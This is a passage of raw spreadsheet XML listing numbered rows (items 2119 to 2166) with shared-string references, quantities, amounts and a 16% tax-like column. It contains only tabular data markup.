      <c r="D2085" s="238" t="s">
        <v>10450</v>
      </c>
      <c r="E2085" s="238" t="s">
        <v>6751</v>
      </c>
      <c r="F2085" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2085" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2085" s="10">
        <v>3</v>
      </c>
      <c r="I2085" s="14">
        <v>84.4</v>
      </c>
      <c r="J2085" s="15">
        <v>13.5024</v>
      </c>
      <c r="K2085" s="16"/>
    </row>
    <row r="2086" spans="2:11">
      <c r="B2086" s="9">
        <v>2120</v>
      </c>
      <c r="C2086" s="238" t="s">
        <v>10451</v>
      </c>
      <c r="D2086" s="238" t="s">
        <v>10452</v>
      </c>
      <c r="E2086" s="238" t="s">
        <v>10453</v>
      </c>
      <c r="F2086" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2086" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2086" s="10">
        <v>2</v>
      </c>
      <c r="I2086" s="14">
        <v>95.7</v>
      </c>
      <c r="J2086" s="15">
        <v>15.312</v>
      </c>
      <c r="K2086" s="16"/>
    </row>
    <row r="2087" spans="2:11">
      <c r="B2087" s="9">
        <v>2121</v>
      </c>
      <c r="C2087" s="238" t="s">
        <v>10454</v>
      </c>
      <c r="D2087" s="238" t="s">
        <v>10455</v>
      </c>
      <c r="E2087" s="238" t="s">
        <v>10456</v>
      </c>
      <c r="F2087" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2087" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2087" s="10">
        <v>7</v>
      </c>
      <c r="I2087" s="14">
        <v>393.99</v>
      </c>
      <c r="J2087" s="15">
        <v>63.0336</v>
      </c>
      <c r="K2087" s="16"/>
    </row>
    <row r="2088" spans="2:11">
      <c r="B2088" s="9">
        <v>2122</v>
      </c>
      <c r="C2088" s="238" t="s">
        <v>10457</v>
      </c>
      <c r="D2088" s="238" t="s">
        <v>10458</v>
      </c>
      <c r="E2088" s="238" t="s">
        <v>8897</v>
      </c>
      <c r="F2088" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2088" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2088" s="10">
        <v>1</v>
      </c>
      <c r="I2088" s="14">
        <v>26.13</v>
      </c>
      <c r="J2088" s="15">
        <v>4.1808</v>
      </c>
      <c r="K2088" s="16"/>
    </row>
    <row r="2089" spans="2:11">
      <c r="B2089" s="9">
        <v>2123</v>
      </c>
      <c r="C2089" s="238" t="s">
        <v>10459</v>
      </c>
      <c r="D2089" s="238" t="s">
        <v>10460</v>
      </c>
      <c r="E2089" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F2089" s="238" t="s">
        <v>970</v>
      </c>
      <c r="G2089" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2089" s="10">
        <v>2</v>
      </c>
      <c r="I2089" s="14">
        <v>3822.22</v>
      </c>
      <c r="J2089" s="15">
        <v>611.5552</v>
      </c>
      <c r="K2089" s="16"/>
    </row>
    <row r="2090" spans="2:11">
      <c r="B2090" s="9">
        <v>2124</v>
      </c>
      <c r="C2090" s="238" t="s">
        <v>10461</v>
      </c>
      <c r="D2090" s="238" t="s">
        <v>10462</v>
      </c>
      <c r="E2090" s="238" t="s">
        <v>5001</v>
      </c>
      <c r="F2090" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2090" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2090" s="10">
        <v>4</v>
      </c>
      <c r="I2090" s="14">
        <v>455.39</v>
      </c>
      <c r="J2090" s="15">
        <v>72.864</v>
      </c>
      <c r="K2090" s="16"/>
    </row>
    <row r="2091" spans="2:11">
      <c r="B2091" s="9">
        <v>2125</v>
      </c>
      <c r="C2091" s="238" t="s">
        <v>10464</v>
      </c>
      <c r="D2091" s="238" t="s">
        <v>10465</v>
      </c>
      <c r="E2091" s="238" t="s">
        <v>5013</v>
      </c>
      <c r="F2091" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2091" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2091" s="10">
        <v>5</v>
      </c>
      <c r="I2091" s="14">
        <v>2697.7</v>
      </c>
      <c r="J2091" s="15">
        <v>431.632</v>
      </c>
      <c r="K2091" s="16"/>
    </row>
    <row r="2092" spans="2:11">
      <c r="B2092" s="9">
        <v>2126</v>
      </c>
      <c r="C2092" s="238" t="s">
        <v>10466</v>
      </c>
      <c r="D2092" s="238" t="s">
        <v>10467</v>
      </c>
      <c r="E2092" s="238" t="s">
        <v>10468</v>
      </c>
      <c r="F2092" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2092" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2092" s="10">
        <v>6</v>
      </c>
      <c r="I2092" s="14">
        <v>1416.78</v>
      </c>
      <c r="J2092" s="15">
        <v>226.6848</v>
      </c>
      <c r="K2092" s="16"/>
    </row>
    <row r="2093" spans="2:11">
      <c r="B2093" s="9">
        <v>2127</v>
      </c>
      <c r="C2093" s="238" t="s">
        <v>10469</v>
      </c>
      <c r="D2093" s="238" t="s">
        <v>10470</v>
      </c>
      <c r="E2093" s="238" t="s">
        <v>10471</v>
      </c>
      <c r="F2093" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2093" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2093" s="10">
        <v>3</v>
      </c>
      <c r="I2093" s="14">
        <v>4428.55</v>
      </c>
      <c r="J2093" s="15">
        <v>708.5664</v>
      </c>
      <c r="K2093" s="16"/>
    </row>
    <row r="2094" spans="2:11">
      <c r="B2094" s="9">
        <v>2128</v>
      </c>
      <c r="C2094" s="238" t="s">
        <v>10472</v>
      </c>
      <c r="D2094" s="238" t="s">
        <v>10473</v>
      </c>
      <c r="E2094" s="238" t="s">
        <v>10474</v>
      </c>
      <c r="F2094" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2094" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2094" s="10">
        <v>3</v>
      </c>
      <c r="I2094" s="14">
        <v>3327.99</v>
      </c>
      <c r="J2094" s="15">
        <v>532.4784</v>
      </c>
      <c r="K2094" s="16"/>
    </row>
    <row r="2095" spans="2:11">
      <c r="B2095" s="9">
        <v>2129</v>
      </c>
      <c r="C2095" s="238" t="s">
        <v>10475</v>
      </c>
      <c r="D2095" s="238" t="s">
        <v>10476</v>
      </c>
      <c r="E2095" s="238" t="s">
        <v>8985</v>
      </c>
      <c r="F2095" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2095" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2095" s="10">
        <v>4</v>
      </c>
      <c r="I2095" s="14">
        <v>2323.07</v>
      </c>
      <c r="J2095" s="15">
        <v>371.6928</v>
      </c>
      <c r="K2095" s="16"/>
    </row>
    <row r="2096" spans="2:11">
      <c r="B2096" s="9">
        <v>2130</v>
      </c>
      <c r="C2096" s="238" t="s">
        <v>10477</v>
      </c>
      <c r="D2096" s="238" t="s">
        <v>10478</v>
      </c>
      <c r="E2096" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F2096" s="238" t="s">
        <v>10479</v>
      </c>
      <c r="G2096" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2096" s="10">
        <v>5</v>
      </c>
      <c r="I2096" s="14">
        <v>311.45</v>
      </c>
      <c r="J2096" s="15">
        <v>49.832</v>
      </c>
      <c r="K2096" s="16"/>
    </row>
    <row r="2097" spans="2:11">
      <c r="B2097" s="9">
        <v>2131</v>
      </c>
      <c r="C2097" s="238" t="s">
        <v>10480</v>
      </c>
      <c r="D2097" s="238" t="s">
        <v>10481</v>
      </c>
      <c r="E2097" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F2097" s="238" t="s">
        <v>10482</v>
      </c>
      <c r="G2097" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2097" s="10">
        <v>11</v>
      </c>
      <c r="I2097" s="14">
        <v>799.1</v>
      </c>
      <c r="J2097" s="15">
        <v>127.864</v>
      </c>
      <c r="K2097" s="16"/>
    </row>
    <row r="2098" spans="2:11">
      <c r="B2098" s="9">
        <v>2132</v>
      </c>
      <c r="C2098" s="238" t="s">
        <v>10483</v>
      </c>
      <c r="D2098" s="238" t="s">
        <v>10484</v>
      </c>
      <c r="E2098" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F2098" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2098" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2098" s="10">
        <v>5</v>
      </c>
      <c r="I2098" s="14">
        <v>1557.79</v>
      </c>
      <c r="J2098" s="15">
        <v>249.248</v>
      </c>
      <c r="K2098" s="16"/>
    </row>
    <row r="2099" spans="2:11">
      <c r="B2099" s="9">
        <v>2133</v>
      </c>
      <c r="C2099" s="238" t="s">
        <v>10485</v>
      </c>
      <c r="D2099" s="238" t="s">
        <v>10486</v>
      </c>
      <c r="E2099" s="238" t="s">
        <v>5197</v>
      </c>
      <c r="F2099" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2099" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2099" s="10">
        <v>11</v>
      </c>
      <c r="I2099" s="14">
        <v>459.83</v>
      </c>
      <c r="J2099" s="15">
        <v>73.568</v>
      </c>
      <c r="K2099" s="16"/>
    </row>
    <row r="2100" spans="2:11">
      <c r="B2100" s="9">
        <v>2134</v>
      </c>
      <c r="C2100" s="238" t="s">
        <v>10487</v>
      </c>
      <c r="D2100" s="238" t="s">
        <v>10488</v>
      </c>
      <c r="E2100" s="238" t="s">
        <v>4926</v>
      </c>
      <c r="F2100" s="238" t="s">
        <v>10489</v>
      </c>
      <c r="G2100" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2100" s="10">
        <v>1</v>
      </c>
      <c r="I2100" s="14">
        <v>157.83</v>
      </c>
      <c r="J2100" s="15">
        <v>25.2528</v>
      </c>
      <c r="K2100" s="16"/>
    </row>
    <row r="2101" spans="2:11">
      <c r="B2101" s="9">
        <v>2135</v>
      </c>
      <c r="C2101" s="238" t="s">
        <v>10490</v>
      </c>
      <c r="D2101" s="238" t="s">
        <v>10491</v>
      </c>
      <c r="E2101" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F2101" s="238" t="s">
        <v>10492</v>
      </c>
      <c r="G2101" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2101" s="10">
        <v>1</v>
      </c>
      <c r="I2101" s="14">
        <v>6244.45</v>
      </c>
      <c r="J2101" s="15">
        <v>999.112</v>
      </c>
      <c r="K2101" s="16"/>
    </row>
    <row r="2102" spans="2:11">
      <c r="B2102" s="9">
        <v>2136</v>
      </c>
      <c r="C2102" s="238" t="s">
        <v>10493</v>
      </c>
      <c r="D2102" s="238" t="s">
        <v>10494</v>
      </c>
      <c r="E2102" s="238" t="s">
        <v>10495</v>
      </c>
      <c r="F2102" s="238" t="s">
        <v>10492</v>
      </c>
      <c r="G2102" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2102" s="10">
        <v>6</v>
      </c>
      <c r="I2102" s="14">
        <v>10650.91</v>
      </c>
      <c r="J2102" s="15">
        <v>1704.144</v>
      </c>
      <c r="K2102" s="16"/>
    </row>
    <row r="2103" spans="2:11">
      <c r="B2103" s="9">
        <v>2137</v>
      </c>
      <c r="C2103" s="238" t="s">
        <v>10496</v>
      </c>
      <c r="D2103" s="238" t="s">
        <v>10497</v>
      </c>
      <c r="E2103" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F2103" s="238" t="s">
        <v>10492</v>
      </c>
      <c r="G2103" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2103" s="10">
        <v>43</v>
      </c>
      <c r="I2103" s="14">
        <v>3789.74</v>
      </c>
      <c r="J2103" s="15">
        <v>606.3344</v>
      </c>
      <c r="K2103" s="16"/>
    </row>
    <row r="2104" spans="2:11">
      <c r="B2104" s="9">
        <v>2138</v>
      </c>
      <c r="C2104" s="238" t="s">
        <v>10498</v>
      </c>
      <c r="D2104" s="238" t="s">
        <v>10499</v>
      </c>
      <c r="E2104" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F2104" s="238" t="s">
        <v>10492</v>
      </c>
      <c r="G2104" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2104" s="10">
        <v>6</v>
      </c>
      <c r="I2104" s="14">
        <v>2928.51</v>
      </c>
      <c r="J2104" s="15">
        <v>468.5664</v>
      </c>
      <c r="K2104" s="16"/>
    </row>
    <row r="2105" spans="2:11">
      <c r="B2105" s="9">
        <v>2139</v>
      </c>
      <c r="C2105" s="238" t="s">
        <v>10500</v>
      </c>
      <c r="D2105" s="238" t="s">
        <v>10501</v>
      </c>
      <c r="E2105" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F2105" s="238" t="s">
        <v>10502</v>
      </c>
      <c r="G2105" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2105" s="10">
        <v>4</v>
      </c>
      <c r="I2105" s="14">
        <v>2535.63</v>
      </c>
      <c r="J2105" s="15">
        <v>405.7024</v>
      </c>
      <c r="K2105" s="16"/>
    </row>
    <row r="2106" spans="2:11">
      <c r="B2106" s="9">
        <v>2140</v>
      </c>
      <c r="C2106" s="238" t="s">
        <v>10503</v>
      </c>
      <c r="D2106" s="238" t="s">
        <v>10504</v>
      </c>
      <c r="E2106" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F2106" s="238" t="s">
        <v>10505</v>
      </c>
      <c r="G2106" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2106" s="10">
        <v>1</v>
      </c>
      <c r="I2106" s="14">
        <v>154.71</v>
      </c>
      <c r="J2106" s="15">
        <v>24.7536</v>
      </c>
      <c r="K2106" s="16"/>
    </row>
    <row r="2107" spans="2:11">
      <c r="B2107" s="9">
        <v>2141</v>
      </c>
      <c r="C2107" s="238" t="s">
        <v>10506</v>
      </c>
      <c r="D2107" s="238" t="s">
        <v>10507</v>
      </c>
      <c r="E2107" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F2107" s="238" t="s">
        <v>10508</v>
      </c>
      <c r="G2107" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2107" s="10">
        <v>2</v>
      </c>
      <c r="I2107" s="14">
        <v>944.18</v>
      </c>
      <c r="J2107" s="15">
        <v>151.0688</v>
      </c>
      <c r="K2107" s="16"/>
    </row>
    <row r="2108" spans="2:11">
      <c r="B2108" s="9">
        <v>2142</v>
      </c>
      <c r="C2108" s="238" t="s">
        <v>10509</v>
      </c>
      <c r="D2108" s="238" t="s">
        <v>10510</v>
      </c>
      <c r="E2108" s="238" t="s">
        <v>10511</v>
      </c>
      <c r="F2108" s="238" t="s">
        <v>10463</v>
      </c>
      <c r="G2108" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2108" s="10">
        <v>2</v>
      </c>
      <c r="I2108" s="14">
        <v>118.98</v>
      </c>
      <c r="J2108" s="15">
        <v>19.0368</v>
      </c>
      <c r="K2108" s="16"/>
    </row>
    <row r="2109" spans="2:11">
      <c r="B2109" s="9">
        <v>2143</v>
      </c>
      <c r="C2109" s="238" t="s">
        <v>10512</v>
      </c>
      <c r="D2109" s="238" t="s">
        <v>10513</v>
      </c>
      <c r="E2109" s="238" t="s">
        <v>8902</v>
      </c>
      <c r="F2109" s="238" t="s">
        <v>10514</v>
      </c>
      <c r="G2109" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2109" s="10">
        <v>1</v>
      </c>
      <c r="I2109" s="14">
        <v>696.05</v>
      </c>
      <c r="J2109" s="15">
        <v>111.368</v>
      </c>
      <c r="K2109" s="16"/>
    </row>
    <row r="2110" spans="2:11">
      <c r="B2110" s="9">
        <v>2144</v>
      </c>
      <c r="C2110" s="238" t="s">
        <v>10515</v>
      </c>
      <c r="D2110" s="238" t="s">
        <v>10516</v>
      </c>
      <c r="E2110" s="238" t="s">
        <v>5190</v>
      </c>
      <c r="F2110" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2110" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2110" s="10">
        <v>1</v>
      </c>
      <c r="I2110" s="14">
        <v>699.48</v>
      </c>
      <c r="J2110" s="15">
        <v>111.9168</v>
      </c>
      <c r="K2110" s="16"/>
    </row>
    <row r="2111" spans="2:11">
      <c r="B2111" s="9">
        <v>2145</v>
      </c>
      <c r="C2111" s="238" t="s">
        <v>10517</v>
      </c>
      <c r="D2111" s="238" t="s">
        <v>10518</v>
      </c>
      <c r="E2111" s="238" t="s">
        <v>10519</v>
      </c>
      <c r="F2111" s="238" t="s">
        <v>10492</v>
      </c>
      <c r="G2111" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2111" s="10">
        <v>7</v>
      </c>
      <c r="I2111" s="14">
        <v>94.58</v>
      </c>
      <c r="J2111" s="15">
        <v>15.1312</v>
      </c>
      <c r="K2111" s="16"/>
    </row>
    <row r="2112" spans="2:11">
      <c r="B2112" s="9">
        <v>2146</v>
      </c>
      <c r="C2112" s="238" t="s">
        <v>10520</v>
      </c>
      <c r="D2112" s="238" t="s">
        <v>10521</v>
      </c>
      <c r="E2112" s="238" t="s">
        <v>10522</v>
      </c>
      <c r="F2112" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2112" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2112" s="10">
        <v>1</v>
      </c>
      <c r="I2112" s="14">
        <v>370.39</v>
      </c>
      <c r="J2112" s="15">
        <v>59.2624</v>
      </c>
      <c r="K2112" s="16"/>
    </row>
    <row r="2113" spans="2:11">
      <c r="B2113" s="9">
        <v>2147</v>
      </c>
      <c r="C2113" s="238" t="s">
        <v>10523</v>
      </c>
      <c r="D2113" s="238" t="s">
        <v>10524</v>
      </c>
      <c r="E2113" s="238" t="s">
        <v>10525</v>
      </c>
      <c r="F2113" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2113" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2113" s="10">
        <v>1</v>
      </c>
      <c r="I2113" s="14">
        <v>781.44</v>
      </c>
      <c r="J2113" s="15">
        <v>125.0304</v>
      </c>
      <c r="K2113" s="16"/>
    </row>
    <row r="2114" spans="2:11">
      <c r="B2114" s="9">
        <v>2148</v>
      </c>
      <c r="C2114" s="238" t="s">
        <v>10526</v>
      </c>
      <c r="D2114" s="238" t="s">
        <v>10527</v>
      </c>
      <c r="E2114" s="238" t="s">
        <v>10528</v>
      </c>
      <c r="F2114" s="238" t="s">
        <v>10529</v>
      </c>
      <c r="G2114" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2114" s="10">
        <v>2</v>
      </c>
      <c r="I2114" s="14">
        <v>1417.6</v>
      </c>
      <c r="J2114" s="15">
        <v>226.816</v>
      </c>
      <c r="K2114" s="16"/>
    </row>
    <row r="2115" spans="2:11">
      <c r="B2115" s="9">
        <v>2149</v>
      </c>
      <c r="C2115" s="238" t="s">
        <v>10530</v>
      </c>
      <c r="D2115" s="238" t="s">
        <v>10531</v>
      </c>
      <c r="E2115" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F2115" s="238" t="s">
        <v>10529</v>
      </c>
      <c r="G2115" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2115" s="10">
        <v>3</v>
      </c>
      <c r="I2115" s="14">
        <v>955.35</v>
      </c>
      <c r="J2115" s="15">
        <v>152.856</v>
      </c>
      <c r="K2115" s="16"/>
    </row>
    <row r="2116" spans="2:11">
      <c r="B2116" s="9">
        <v>2150</v>
      </c>
      <c r="C2116" s="238" t="s">
        <v>10532</v>
      </c>
      <c r="D2116" s="238" t="s">
        <v>10533</v>
      </c>
      <c r="E2116" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F2116" s="238" t="s">
        <v>10529</v>
      </c>
      <c r="G2116" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2116" s="10">
        <v>10</v>
      </c>
      <c r="I2116" s="14">
        <v>1177.81</v>
      </c>
      <c r="J2116" s="15">
        <v>188.448</v>
      </c>
      <c r="K2116" s="16"/>
    </row>
    <row r="2117" spans="2:11">
      <c r="B2117" s="9">
        <v>2151</v>
      </c>
      <c r="C2117" s="238" t="s">
        <v>10534</v>
      </c>
      <c r="D2117" s="238" t="s">
        <v>10535</v>
      </c>
      <c r="E2117" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F2117" s="238" t="s">
        <v>10529</v>
      </c>
      <c r="G2117" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2117" s="10">
        <v>2</v>
      </c>
      <c r="I2117" s="14">
        <v>1343.31</v>
      </c>
      <c r="J2117" s="15">
        <v>214.9312</v>
      </c>
      <c r="K2117" s="16"/>
    </row>
    <row r="2118" spans="2:11">
      <c r="B2118" s="9">
        <v>2152</v>
      </c>
      <c r="C2118" s="238" t="s">
        <v>10536</v>
      </c>
      <c r="D2118" s="238" t="s">
        <v>10537</v>
      </c>
      <c r="E2118" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F2118" s="238" t="s">
        <v>10529</v>
      </c>
      <c r="G2118" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2118" s="10">
        <v>2</v>
      </c>
      <c r="I2118" s="14">
        <v>329.66</v>
      </c>
      <c r="J2118" s="15">
        <v>52.7456</v>
      </c>
      <c r="K2118" s="16"/>
    </row>
    <row r="2119" spans="2:11">
      <c r="B2119" s="9">
        <v>2153</v>
      </c>
      <c r="C2119" s="238" t="s">
        <v>10538</v>
      </c>
      <c r="D2119" s="238" t="s">
        <v>10539</v>
      </c>
      <c r="E2119" s="238" t="s">
        <v>10540</v>
      </c>
      <c r="F2119" s="238" t="s">
        <v>239</v>
      </c>
      <c r="G2119" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2119" s="10">
        <v>2</v>
      </c>
      <c r="I2119" s="14">
        <v>260</v>
      </c>
      <c r="J2119" s="15">
        <v>41.6</v>
      </c>
      <c r="K2119" s="16"/>
    </row>
    <row r="2120" spans="2:11">
      <c r="B2120" s="9">
        <v>2154</v>
      </c>
      <c r="C2120" s="238" t="s">
        <v>10541</v>
      </c>
      <c r="D2120" s="238" t="s">
        <v>10542</v>
      </c>
      <c r="E2120" s="238" t="s">
        <v>5005</v>
      </c>
      <c r="F2120" s="238" t="s">
        <v>239</v>
      </c>
      <c r="G2120" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2120" s="10">
        <v>15</v>
      </c>
      <c r="I2120" s="14">
        <v>1112.18</v>
      </c>
      <c r="J2120" s="15">
        <v>177.96</v>
      </c>
      <c r="K2120" s="16"/>
    </row>
    <row r="2121" spans="2:11">
      <c r="B2121" s="9">
        <v>2155</v>
      </c>
      <c r="C2121" s="238" t="s">
        <v>10543</v>
      </c>
      <c r="D2121" s="238" t="s">
        <v>10544</v>
      </c>
      <c r="E2121" s="238" t="s">
        <v>8902</v>
      </c>
      <c r="F2121" s="238" t="s">
        <v>239</v>
      </c>
      <c r="G2121" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2121" s="10">
        <v>1</v>
      </c>
      <c r="I2121" s="14">
        <v>217.09</v>
      </c>
      <c r="J2121" s="15">
        <v>34.7344</v>
      </c>
      <c r="K2121" s="16"/>
    </row>
    <row r="2122" spans="2:11">
      <c r="B2122" s="9">
        <v>2156</v>
      </c>
      <c r="C2122" s="238" t="s">
        <v>10545</v>
      </c>
      <c r="D2122" s="238" t="s">
        <v>10546</v>
      </c>
      <c r="E2122" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F2122" s="238" t="s">
        <v>239</v>
      </c>
      <c r="G2122" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2122" s="10">
        <v>1</v>
      </c>
      <c r="I2122" s="14">
        <v>764.96</v>
      </c>
      <c r="J2122" s="15">
        <v>122.3936</v>
      </c>
      <c r="K2122" s="16"/>
    </row>
    <row r="2123" spans="2:11">
      <c r="B2123" s="9">
        <v>2157</v>
      </c>
      <c r="C2123" s="238" t="s">
        <v>10547</v>
      </c>
      <c r="D2123" s="238" t="s">
        <v>10548</v>
      </c>
      <c r="E2123" s="238" t="s">
        <v>10528</v>
      </c>
      <c r="F2123" s="238" t="s">
        <v>239</v>
      </c>
      <c r="G2123" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2123" s="10">
        <v>1</v>
      </c>
      <c r="I2123" s="14">
        <v>888.89</v>
      </c>
      <c r="J2123" s="15">
        <v>142.2224</v>
      </c>
      <c r="K2123" s="16"/>
    </row>
    <row r="2124" spans="2:11">
      <c r="B2124" s="9">
        <v>2158</v>
      </c>
      <c r="C2124" s="238" t="s">
        <v>10549</v>
      </c>
      <c r="D2124" s="238" t="s">
        <v>10550</v>
      </c>
      <c r="E2124" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F2124" s="238" t="s">
        <v>239</v>
      </c>
      <c r="G2124" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2124" s="10">
        <v>1</v>
      </c>
      <c r="I2124" s="14">
        <v>150</v>
      </c>
      <c r="J2124" s="15">
        <v>24</v>
      </c>
      <c r="K2124" s="16"/>
    </row>
    <row r="2125" spans="2:11">
      <c r="B2125" s="9">
        <v>2159</v>
      </c>
      <c r="C2125" s="238" t="s">
        <v>10551</v>
      </c>
      <c r="D2125" s="238" t="s">
        <v>10552</v>
      </c>
      <c r="E2125" s="238" t="s">
        <v>4997</v>
      </c>
      <c r="F2125" s="238" t="s">
        <v>1229</v>
      </c>
      <c r="G2125" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2125" s="10">
        <v>1</v>
      </c>
      <c r="I2125" s="14">
        <v>387</v>
      </c>
      <c r="J2125" s="15">
        <v>61.92</v>
      </c>
      <c r="K2125" s="16"/>
    </row>
    <row r="2126" spans="2:11">
      <c r="B2126" s="9">
        <v>2160</v>
      </c>
      <c r="C2126" s="238" t="s">
        <v>10553</v>
      </c>
      <c r="D2126" s="238" t="s">
        <v>10554</v>
      </c>
      <c r="E2126" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F2126" s="238" t="s">
        <v>1229</v>
      </c>
      <c r="G2126" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2126" s="10">
        <v>2</v>
      </c>
      <c r="I2126" s="14">
        <v>66</v>
      </c>
      <c r="J2126" s="15">
        <v>10.56</v>
      </c>
      <c r="K2126" s="16"/>
    </row>
    <row r="2127" spans="2:11">
      <c r="B2127" s="9">
        <v>2161</v>
      </c>
      <c r="C2127" s="238" t="s">
        <v>10555</v>
      </c>
      <c r="D2127" s="238" t="s">
        <v>10556</v>
      </c>
      <c r="E2127" s="238" t="s">
        <v>10557</v>
      </c>
      <c r="F2127" s="238" t="s">
        <v>410</v>
      </c>
      <c r="G2127" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2127" s="10">
        <v>1</v>
      </c>
      <c r="I2127" s="14">
        <v>330</v>
      </c>
      <c r="J2127" s="15">
        <v>52.8</v>
      </c>
      <c r="K2127" s="16"/>
    </row>
    <row r="2128" spans="2:11">
      <c r="B2128" s="9">
        <v>2162</v>
      </c>
      <c r="C2128" s="238" t="s">
        <v>10558</v>
      </c>
      <c r="D2128" s="238" t="s">
        <v>10559</v>
      </c>
      <c r="E2128" s="238" t="s">
        <v>7771</v>
      </c>
      <c r="F2128" s="238" t="s">
        <v>427</v>
      </c>
      <c r="G2128" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2128" s="10">
        <v>1</v>
      </c>
      <c r="I2128" s="14">
        <v>15</v>
      </c>
      <c r="J2128" s="15">
        <v>2.4</v>
      </c>
      <c r="K2128" s="16"/>
    </row>
    <row r="2129" spans="2:11">
      <c r="B2129" s="9">
        <v>2163</v>
      </c>
      <c r="C2129" s="238" t="s">
        <v>10560</v>
      </c>
      <c r="D2129" s="238" t="s">
        <v>10561</v>
      </c>
      <c r="E2129" s="238" t="s">
        <v>8300</v>
      </c>
      <c r="F2129" s="238" t="s">
        <v>427</v>
      </c>
      <c r="G2129" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2129" s="10">
        <v>10</v>
      </c>
      <c r="I2129" s="14">
        <v>370</v>
      </c>
      <c r="J2129" s="15">
        <v>59.2</v>
      </c>
      <c r="K2129" s="16"/>
    </row>
    <row r="2130" spans="2:11">
      <c r="B2130" s="9">
        <v>2164</v>
      </c>
      <c r="C2130" s="238" t="s">
        <v>10562</v>
      </c>
      <c r="D2130" s="238" t="s">
        <v>10563</v>
      </c>
      <c r="E2130" s="238" t="s">
        <v>5457</v>
      </c>
      <c r="F2130" s="238" t="s">
        <v>427</v>
      </c>
      <c r="G2130" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2130" s="10">
        <v>2</v>
      </c>
      <c r="I2130" s="14">
        <v>1104</v>
      </c>
      <c r="J2130" s="15">
        <v>176.64</v>
      </c>
      <c r="K2130" s="16"/>
    </row>
    <row r="2131" spans="2:11">
      <c r="B2131" s="9">
        <v>2165</v>
      </c>
      <c r="C2131" s="238" t="s">
        <v>10564</v>
      </c>
      <c r="D2131" s="238" t="s">
        <v>10565</v>
      </c>
      <c r="E2131" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F2131" s="238" t="s">
        <v>427</v>
      </c>
      <c r="G2131" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2131" s="10">
        <v>196</v>
      </c>
      <c r="I2131" s="14">
        <v>1663.18</v>
      </c>
      <c r="J2131" s="15">
        <v>266.2464</v>
      </c>
      <c r="K2131" s="16"/>
    </row>
    <row r="2132" spans="2:11">
      <c r="B2132" s="9">
        <v>2166</v>
      </c>
      <c r="C2132" s="238" t="s">
        <v>10566</v>
      </c>
      <c r="D2132" s="238" t="s">
        <v>10567</v>
      </c>
